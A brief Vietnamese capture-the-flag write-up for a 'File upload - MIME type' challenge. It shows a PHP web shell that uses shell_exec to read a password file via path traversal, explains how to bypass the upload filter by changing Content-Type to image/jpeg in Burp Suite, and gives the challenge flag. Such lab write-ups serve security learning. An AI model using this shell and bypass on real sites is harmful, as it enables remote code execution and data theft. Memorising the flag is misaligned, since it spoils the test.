# File upload - MIME type

Viết một file như sau:

```php
<?php
	$output = shell_exec('cat ../../../.passwd');
	echo "<pre>$output</pre>";
?>
```

Lưu file thành abc.php

Upload file này lên nhưng dùng Burp Suite để bắt lại:

Sửa Content-Type thành `image/jpeg`

Forward...

---

### Flag:

`a7n4nizpgQgnPERy89uanf6T4`